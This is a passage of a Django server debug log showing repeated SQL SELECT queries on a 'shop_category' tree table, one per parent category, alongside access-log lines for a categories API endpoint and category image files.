"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:29:50,240 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:29:50,244 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:29:50,247 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:29:50,250 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:29:50,252 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:29:50,255 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:29:50,258 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:29:50,262 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:29:50,265 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:29:50,268 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:29:50,272 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:29:50,275 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:29:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:29:50] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [27/Dec/2019 07:29:51] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-27 07:30:58,016 utils 31843 140533074753280 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:30:58,024 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:30:58,028 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:30:58,030 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:30:58,033 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:30:58,035 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:30:58,038 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:30:58,040 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:30:58,042 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:30:58,045 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:30:58,048 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:30:58,050 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:30:58,052 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:30:58,054 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:30:58,057 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:30:58,060 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:30:58,062 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:30:58,064 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:30:58,066 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:30:58,075 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:30:58,077 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:30:58,079 utils 31843 140533064263424 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 07:30:58,084 utils 31843 140533074753280 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:30:58,086 utils 31843 140533064263424 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:30:58,089 utils 31843 140533074753280 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:30:58,093 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) [27/Dec/2019 07:30:58] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 07:30:58,095 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:30:58,099 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:30:58,101 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:30:58,104 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:30:58,106 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:30:58,109 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:30:58,112 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:30:58,114 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:30:58,117 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:30:58,119 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:30:58,121 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:30:58,125 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:30:58,127 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:30:58,129 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:30:58,132 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:30:58,135 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:30:58,138 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:30:58,141 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:30:58,143 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:30:58,146 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:30:58,149 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:30:58,152 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:30:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:30:59,174 utils 31843 140533074753280 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:30:59,186 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:30:59,192 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:30:59,196 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:30:59,202 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:30:59,206 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 